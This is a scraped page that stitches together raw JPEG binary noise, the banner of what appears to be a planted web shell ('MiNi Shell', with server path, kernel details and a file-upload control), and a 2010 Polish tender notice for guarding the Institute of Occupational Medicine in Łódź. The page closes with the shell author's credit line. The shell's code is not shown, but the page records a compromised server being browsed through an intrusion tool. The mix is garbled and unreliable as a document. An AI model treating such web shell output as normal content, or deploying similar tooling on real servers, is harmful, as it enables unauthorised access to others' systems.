JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/13195-N-2010.html

<p class="kh_header"><b>Łódź: Ochrona budynków i mienia Instytutu Medycyny Pracy w Łodzi.</b><br>
<b>Numer ogłoszenia: 13195 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy im. prof. dra med. Jerzego Nofera , ul. Św. Teresy od Dzieciątka Jezus 8, 91-348 Łódź, woj. łódzkie, tel. 042 6314871, faks 042 6314872.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona budynków i mienia Instytutu Medycyny Pracy w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest: dozór, ochrona mienia i budynków Instytutu Medycyny Pracy w Łodzi. Zakres podstawowych obowiązków pracowników dozoru ochrony obejmuje:

I. PORTIERNIA  A

  Do szczególnych obowiązków pracownika dozoru-ochrony PORTIERNI A w   budynku przy ul. Św. Teresy od Dzieciątka Jezus 8, należy :

1.Codzienna całodobowa jednoosobowa ochrona obiektu przy ul. Św. Teresy 8 wraz z obsługą Portierni A obejmującą budynek wysoki Instytutu (budynek A) i część budynku niskiego (budynek B) zaplecze pomiędzy bramą nr 6 i bramą nr 1, budynki magazynowe, garaże, i budynki techniczne. Dotyczy to w szczególności:
-ochrony przed kradzieżą, dewastacją, pożarem, zalaniem i innymi zdarzeniami losowymi
-podstawowej obsługi centralki alarmowej ppoż., w przypadku pojawienia się alarmu.
2.Kontrola ruchu osobowego oraz kontrola wynoszonego sprzętu, materiałów itp. ( za okazaniem przepustek materiałowych wystawianych przez Sekcję Techniczno-Administracyjną).
3.Wydawanie- przyjmowanie dokumentów i kluczy od samochodów służbowych IMP od kierowców IMP, oraz osób uprawnionych ( za pokwitowaniem w rejestrze).
4.Wydawanie-przyjmowanie kluczy od pomieszczeń Budynku A i części naukowej Budynku B oraz pomieszczeń budynku Technicznego - wyłącznie uprawnionym pracownikom , za pokwitowaniem w rejestrze.
5.Wydawanie-przyjmowanie kluczy do pokoi hotelowych wg listy zakwaterowania przygotowanej przez pracownika Sekcji Techniczno-Administracyjnej oraz pomoc w wypełnieniu karty meldunkowej, jeśli zaistnieje taka potrzeba, a następnie przekazanie jej pracownikowi Sekcji Techniczno Administracyjnej. Wzór listy zakwaterowania, druki oświadczeń dotyczących korzystania z Parkingu osób zakwaterowanych w hotelu oraz dodatkowe informacje znajdują się w załączeniu do niniejszej specyfikacji. 
6.Informowanie i kierowanie ruchem osobowym interesantów i gości Instytutu (zgodnie z obowiązującymi zasadami- Instrukcja-zawarta w  Zarządzeniu Wewnętrznym Nr 72000 z dnia 21 kwietnia 2000 r. Dyrektora IMP w Łodzi im. prof. dra med. Jerzego Nofera- str.2).
7.Obsługa bramy nr 1, i uruchamianie automatycznej zapory umożliwiającej wjazd wyjazd na parking przed wejściem głównym).
8.Codzienne otwieranie zamykanie w określonych godzinach Bramy nr 1, 6, 8, 9 i przejścia na I p. między budynkami A i B (rano o godz. 630, popołudniu o godz. 1630).
9.Codzienne otwieranie i zamykanie krat, wyjść awaryjnych klatki schodowej D , E,  G - otwieranie o godz. 700, zamykanie o godz.1700.
10.Obsługa szatni w sobotę i w niedzielę, gdy wymagają tego okoliczności i potrzeby 
IMP.
11.Prowadzenie Książki Dyżurów,  w której dokonuje się regularnych wpisów  oraz uwag,  zdarzeń, awarii, uszkodzeń itp.
12.Portier ma prawo i obowiązek dokonania kontroli wynoszonego bagażu budzącego podejrzenia, że wynoszony sprzęt jest własnością Instytutu, ma prawo żądać przepustek materiałowych na wynoszony sprzęt, materiały, przedmioty itp., wystawionych przez Sekcję Techniczno-Administracyjną na dany dzień i godzinę.
13.Czuwanie nad stanem bezpieczeństwa pożarowego w rejonie dozorowanego obiektu, szczególnie w godzinach  wieczornych i nocnych. Wymagana znajomość podstawowych czynności przy obsłudze sygnalizacji ppoż., zaworów wody,  znajomości Instrukcji Bezpieczeństwa pożarowego i Planu ewakuacji. W przypadku nieuzasadnionego (z winy Zleceniobiorcy) przyjazdu jednostki straży pożarnej koszty interwencji pokrywa Zleceniobiorca.  
14.Ewidencjonowanie przeprowadzanych rozmów telefonicznych w przypadkach awaryjnych (data, godz. Nr telef.- sprawa).
15.Powiadamianie telefoniczne dyżurujących pod telefonem pracowników technicznych (po godzinach pracy) o zaistniałych awariach, zdarzeniach, odnotowując w Książce dyżurów. Lista pracowników dyżurujących pod telefonem przekazywana jest na Portierni A- na każdy nowy miesiąc,

oraz powiadamianie w ciągu dnia pracy:

W sprawach technicznych :
Kierownika Sekcji Techniczno-Administracyjnej                         = tel. wew. 865
Pracownika inżynieryjnego Sekcji Techniczno-Administracyjnej   = tel. wew. 864

W sprawach administracyjno-gospodarczych:
Kierownika Sekcji Techniczno-Administracyjnej                          = tel. wew. 865
Samodzielnego referenta  Działu Adm. - Technicznego               = tel. wew. 860

W sprawach  ogólnych - wyjątkowych: 
Kierownika Działu Adm. - Technicznego                                    = tel. wew.  859
Specjalistę ds. Administracyjnych                                             = tel. wew.  874

16.Zapalanie i gaszenie  oświetlenia  wewnątrz budynku, świateł dyżurnych lub  zgodnie z  zaleceniami kierownika Sekcji Techniczno-Administracyjnej.
17.Obsługa głównych portierni: A , B i szatni w budynku Zamawiającego, przy ul. Św. Teresy w Łodzi zobowiązana jest posiadać jednolite umundurowanie.
18.Pracownik Portierni A ma obowiązek utrzymania jej w czystości (codzienne sprzątanie).
19.Pracownik Portierni A ma obowiązek odśnieżania i posypywania środkami antypoślizgowymi (np. piaskiem) wejścia do budynku A (schodów i parkingu dla dyrekcji) w przypadku nagromadzenia się śniegu - w dni wolne od pracy w IMP oraz po godzinach pracy IMP tj. gdy służby techniczne IMP są nieobecne. Stosowny sprzęt i środki zabezpiecza Zamawiający.




II. Szatnia IMP

Zatrudnienie sezonowe w okresie od początku 37 tygodnia roku do końca 19 tygodnia roku następnego w godzinach 700-1700  od   poniedziałku do piątku (w soboty, niedziele i inne dni wolne od pracy w IMP szatnię obsługuje portier z Portierni A).
                     
1. Zatrudniony pracownik-szatniarz jest odpowiedzialny materialnie za przyjętą do szatni 
    odzież zewnętrzną,
2. Przyjmowanie i wydawanie odzieży -tylko za wydaniem i zwrotem numerka fabrycznego   
    Instytutu,
3. Zatrudniony pracownik-szatniarz jest zobowiązany do codziennej kontroli ilości numerków i 
    zdejmowania ich przed dniami wolnymi od pracy (lub przekazania określonej ilości  
    numerków wskazanemu pracownikowi IMP - zgodnie z zaleceniem kierownictwa Działu  
    Administracyjno-Technicznego).
4. Pracownik obsługi Szatni ma obowiązek utrzymania jej w czystości(codzienne   
     sprzątanie),
5. Pracownik szatni winien być wyposażony w firmowe umundurowanie.


III. PORTIERNIA B

Do szczególnych obowiązków pracownika dozoru-ochrony PORTIERNI B w budynku przy ul. Św. Teresy od Dzieciątka Jezus 8 należy:


1.	Obsługa całodobowa jednoosobowa Portierni B wraz z ochroną obiektu obejmującą:
-Przychodnię Chorób Zawodowych,
-Klinikę Chorób Zawodowych i Toksykologii,
-Klinikę Audiologii i Foniatrii,
-Ośrodek Alergii Zawodowej i Zdrowia Środowiskowego,
-Zakład Immunotoksykologii,
-Zakład Psychologii,
oraz parking ogólny od ul. Św. Teresy (między bramą nr 1 a bramą nr 3) i parking kliniczny (podwórze między bramą nr 4, a bramą nr 6).
2.Obsługa szatni dla interesantów Przychodni Chorób Zawodowych, Kliniki  Audiologii i Foniatrii, Ośrodka Alergii Zawodowej i Zdrowia Środowiskowego, Kliniki Chorób Zawodowych i Toksykologii.
3.Informowanie i kierowaniem ruchem osobowym pacjentów i interesantów Przychodni Chorób zawodowych, Kliniki Chorób Zawodowych i Toksykologii, Kliniki Audiologii i Foniatrii, Ośrodka Alergii Zawodowej i Zdrowia Środowiskowego. 
4.Kontrola ruchu osobowego przez Portiernię B:
-Pacjenci na badania w Przychodni Chorób Zawodowych, Ośrodku Alergii Zawodowej i Zdrowia Środowiskowego, po okazaniu skierowania, kierowani są do rejestracji.
-Pacjenci Klinik mogą wejść na teren po okazaniu skierowań na badania lub hospitalizację, osoby odwiedzające chorych przebywających w Klinikach mogą wejść codziennie w godz. 1400-1700 a przed 1400 i po 1700 po uzgodnieniu telefonicznym z dyżurką pielęgniarek,(Toksykologia tel.757, Choroby Zawodowe tel.770)
-Osoby zgłaszające się w celu uzyskania informacji o stanie zdrowia chorych przebywających w Klinice mogą wejść na teren Kliniki po uprzednim uzgodnieniu telefonicznym z pielęgniarką (Izba Przyjęć), tel.-754; dyżurką pielęgniarek I piętro tel.-757; dyżurką pielęgniarek II piętro tel.-770 lub  z lekarzem dyżurnym tel.-763,
-Pracownicy Instytutu mogą wejść na teren do godz. 1700 bez przepustki (po okazaniu karty zegarowej) a po godz. 1700  tylko za okazaniem aktualnej przepustki wystawionej przez Sekcję Techniczno-Administracyjną, (zwolnieni są pracownicy klinik i Zakładu Immunotoksykologii pracujący na zmiany).
5.	Kontrola ruchu pojazdów przez bramę nr 3 i nr 4:
-Dozwolony wjazd na parking ogólny wyłącznie dla pracowników Instytutu, których pojazdy są odpowiednio i prawidłowo oznakowane literką P na tle żółtym w granatowym kole zębatym,
-Brama nr 3 otwierana o godz. 600, zamykana o godz. 2000,
-W godz. 1530-700 mogą parkować samochody kursantów zakwaterowanych w Instytucie  (po okazaniu dowodu zakwaterowania).
6.	Kontrola ruch pojazdów przez bramę nr4:
-Bez przepustek dozwolony wjazd dla karetek pogotowia ratunkowego, oraz oznakowanych pojazdów policyjnych dowożących i pilnujących pacjentów uzależnionych.
-Bez przepustek ale po uzgodnieniu telefonicznym z Sekcją Techniczno-Administracyjną, samochody dostawcze,
-Oznakowanie samochodu literką Pw kolorze niebieskim upoważnia do wjazdu na parking kliniczny po sprawdzeniu w wykazie uprawnionych osób.
7.Portier wydaje i przyjmuje klucze od  pomieszczeń  Przychodni Chorób Zawodowych wyłącznie za pokwitowaniem w Rejestrze pobierania zdawania kluczy przez uprawnionych pracowników Przychodni (czytelne podpisy).
8.Portier ma prawo i obowiązek dokonania kontroli wynoszonego bagażu budzącego podejrzenia, że wynoszony sprzęt jest własnością Instytutu, ma prawo żądać przepustek materiałowych na wynoszony sprzęt, materiały, przedmioty itp. Wystawionych przez Sekcję Techniczno-Administracyjną na dany dzień i godzinę
9.Czuwanie nad stanem bezpieczeństwa pożarowego w rejonie dozorowanego obiektu szczególnie w godzinach wieczornych i nocnych. Znajomość  lokalizacji zaworów wody,  znajomości Instrukcji Bezpieczeństwa pożarowego i Planu ewakuacji. W przypadku nieuzasadnionego (z winy Zleceniobiorcy) przyjazdu jednostki straży pożarnej koszty interwencji pokrywa Zleceniobiorca.  
10.Powiadamia telefonicznie o zaistniałych awariach, zdarzeniach Portiernię A (tel. 891)  odnotowując w Książce Dyżurów. 
11.Obsługa głównych portierni: (A i B) w budynku Zamawiającego, przy ul. Św. Teresy  8 w Łodzi zobowiązana jest posiadać jednolite umundurowanie.
12. Pracownik Portierni B ma obowiązek utrzymania jej w czystości (codzienne  sprzątanie).
13. Pracownik Portierni B ma obowiązek odśnieżania i posypywania środkami antypoślizgowymi (np. piaskiem) wejścia do budynku B (kompleksu schodów i drogi do furtki wejściowej na teren Szpitala Biegańskiego) w   przypadku nagromadzenia się śniegu - w dni wolne od pracy w IMP oraz po godzinach pracy IMP., gdy służby techniczne IMP są nieobecne. Stosowny sprzęt i środki zabezpiecza Zamawiający..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.	Udział w postępowaniu o udzielenie zamówienia publicznego mogą wziąć Wykonawcy, którzy spełniają warunki dotyczące:

a.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b.	posiadania wiedzy i doświadczenia;
c.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d.	sytuacji ekonomicznej i finansowej;
e.	wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

II.	Warunki dodatkowe    

1. Pracownicy zatrudnieni przy ochronie będą zatrudnieni przez Wykonawcę w ramach umowy o pracę. Wykonawca potwierdzi ten fakt stosownym oświadczeniem załączonym do treści składanej oferty.

2. Wykonawca składający ofertę musi dysponować minimum 4 pracownikami ochrony z licencją pracownika ochrony II stopnia oraz minimum 5 pracownikami z licencją pracownika ochrony I stopnia.

3. Pracownicy sprawujący nadzór ze strony Wykonawcy będą posiadać licencję II stopnia w zakresie ochrony. Wykonawca potwierdzi ten fakt stosownym oświadczeniem załączonym do treści składanej oferty.

4. Wykonawca przedstawi przewidywaną ilość zatrudnionych pracowników przy dozorze i obsłudze szatni (uwzględniając Portiernię A i B oraz szatnię).

5. O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, u których ponad 50% zatrudnionych pracowników stanowią osoby niepełnosprawne w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych lub właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych, oraz wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy o okolicznościach, o których mowa w art. 24 ust. 1 ustawy Zamawiający żąda następujących dokumentów: 

1.1 koncesji, zezwolenia lub licencji, 

1.2 aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;

1.3 aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego
oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego
potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz
składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w
całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3
miesiące przed upływem terminu składania ofert;

1.4  wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również
wykonywanych (minimum 3) usług o wartości minimum 200.000 zł brutto rocznie każda w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadający swoim rodzajem usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców, tel. kontaktowych odbiorców oraz załączenie dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (referencje minimum 3).

Do oferty winny być załączone minimum 3, a maksimum 20 referencji. W przypadku załączenia więcej niż 20 referencji, Zamawiający będzie brał pod uwagę 20 pierwszych.   

1.5 opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200.000 zł. 

1.6 umowy spółki cywilnej, jeżeli działalność gospodarcza prowadzona jest w formie spółki cywilnej z ewentualnymi aneksami wskazującymi aktualny, na dzień składania ofert sposób reprezentowania spółki. Ponadto każdy ze wspólników spółki cywilnej zobowiązany jest dostarczyć indywidualny wypis z rejestru ewidencji działalności gospodarczej.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcja firm) dokumenty, o których mowa w pkt. 1.1. - 1.3. składa każdy z nich. 

Ponadto:

2. wypełniony druk oferty stanowiący Załącznik nr 1 do SIWZ,

3. oświadczenie o spełnianiu warunków udziału w postępowaniu zgodne z art. 22 i 24 ustawy Prawo zamówień publicznych (Załącznik nr 2 do SIWZ). W przypadku złożenia oferty przez podmioty występujące wspólnie, oświadczenie składają wspólnie wszyscy uczestnicy podmiotu,

4. wypełniony formularz ofertowy stanowiący Załącznik nr 3 do SIWZ, 

5. wypełniony Załącznik nr 4 do SIWZ doświadczenie Wykonawcy, 

6. wykaz pracowników posiadających licencję I i II stopnia wraz z dokumentami stwierdzającymi, że osoby wskazane w wykazie posiadają wymagane uprawnienia,

7.  oświadczenia, o których mowa w Warunkach dodatkowych niniejszej SIWZ,

8. przewidywana ilość zatrudnionych pracowników przy dozorze i obsłudze szatni,

9. oświadczenie Wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych lub właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie Wykonawcy - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.imp.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> INSTYTUT MEDYCYNY PRACY IM. PROF. DRA MED. JERZEGO  NOFERA
91-348 ŁÓDŹ, UL. ŚW. TERESY OD DZIECIĄTKA JEZUS NR 8, POKÓJ 86 - SEKCJA ZAMÓWIEŃ PUBLICZNYCH..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 11:00, miejsce: INSTYTUT MEDYCYNY PRACY IM. PROF. DRA MED. JERZEGO  NOFERA
91-348 ŁÓDŹ, UL. ŚW. TERESY OD DZIECIĄTKA JEZUS NR 8, POKÓJ 81 - KANCELARIA GŁÓWNA..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com